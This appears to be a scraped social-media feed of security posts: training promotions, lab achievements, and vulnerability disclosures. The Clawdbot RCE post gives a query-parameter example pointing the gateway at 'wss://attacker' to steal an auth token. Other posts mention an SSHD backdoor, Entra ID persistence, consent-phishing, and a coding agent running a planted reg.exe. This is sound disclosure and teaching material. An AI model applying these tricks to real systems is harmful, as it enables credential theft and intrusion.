lee1981

State of the Cybersecurity Workforce, JHT / WiCyS RSAC Preview x.com/i/broadcasts/1…

RT @JustHackingHQ: We built a hardware target to teach exploitation. @_t1v0_ designed the PCB. @_JohnHammond built the bootloader + OS. We…

GraphSpy: A Hacker's Tooling Deep Dive, video demos with the creator @RedByte1337! 🤩 Keanu shows me the wild things you can do for post-exploitation in Entra ID -- even adding a physical security key for persistence and a ton of other tricks 🤯 Video: youtu.be/qEtoKC32UoE

Level up your IR skills by mastering Linux data analysis. Parse artifacts. Pull logs from the host. Apply it in real forensic workflows. That’s real defensive depth. Appreciate @Antonlovesdnb’s perspective. Learn more: justhacking.com/course/constru… #CyberSecurity #DFIR #LinuxSecurity #BlueTeam

funny nugget from the Payload Podcast with @JonnyJohnson_ today looks like claude code 2.1.69 on Windows shells out to do a registry query for settings (both HKCU and HKLM) so any reg.exe in your project folder would run right as claude starts up when will cc be a lolbin 😝

The recent Trezor-physical-mail-phish-delivery-crypto-scam made me giggle -- so I rambled about it in a video. I'm not a crypto guy but alarm bells should probably go off in your mind when something is asking for your recovery seed phrase. 😅 Video: youtu.be/UQFySFs2GJk

RT @JustHackingHQ: T-12 Hours! ⌛ 20% Off John Hammond's Dark Web 2 expires Midnight ET justhacking.com/course/dark-we… Bring your hacker mindset to…

RT @JustHackingHQ: New Free Upskill Challenge! justhacking.com/uc/uc-nessus/ "Pentesting for the Masses" series on common hacking tools used on t…

RT @JustHackingHQ: Learn REST APIs in PS7 to open new automation ideas. justhacking.com/uc/uc-powershe… 2nd Free Upskill Challenge by Andrew Pla, M…

🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.  The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇 We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load. Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏 On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…

😀I just solved Dream Job-2 on Hack The Box! Another Amazing Sherlock Investigation👌😀 labs.hackthebox.com/achievement/sh… #HackTheBox #HTB #CyberSecurity #EthicalHacking #InfoSec #PenTesting

I just solved MangoBleed on Hack The Box! 😀Brilliant Investigation For a lovely Friday Evening 😃 labs.hackthebox.com/achievement/sh… #HackTheBox #HTB #CyberSecurity #EthicalHacking #InfoSec #PenTesting

😀 Another Quality Year of Learning Complete Over on TryHackMe😎 Huge Thanks to @tryhackme For the Amazing Year 😀👍.

Another Amazing Advent of Cyber Completed😃 massive thanks to @tryhackme for another brilliant year of challenges!😀😀😀.

This is one very tasty offer to be had over on learn.justhacking.com "Use Code CYBER25 For 25% Off Courses! Ends Mid ET Dec 31"😀. I Used it on this beauty of a course "Windows Log Analysis - SIEMless Threat Hunting"😀one of many amazing courses available, The course looks

🚨 DAY 16 IS LIVE 🚨 Welcome to Registry Forensics. McSkidy is still missing. dispatch-srv01 didn’t just break...it was touched. And the Windows Registry? Yeah… it remembers everything. No guessing. No vibes. Just cold, forensic truth. 🕵️‍♀️ The clock’s ticking. The evidence is waiting. 👉 Start Day 16 now: tryhackme.com/adventofcyber2…

THC Release: 🎄Smallest SSHD backdoor🎄 - Does not add any new file - Survives apt-update - Does not use PAM or authorized_keys Just SSHD trickery....adds one line only. More at thc.org/tips 👌

Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - @yeswehack yeswehack.com/fr/learn-bug-b…

"'ConsentFix', a browser-based ClickFix-style attack with OAuth consent grants" ... leveraging the Azure CLI app client to social engineer for easy access into Entra ID 👀 I got nerdsniped by this, so I played with it a bit and tried a drag-and-drop gesture! Video: youtu.be/AAiiIY-Soak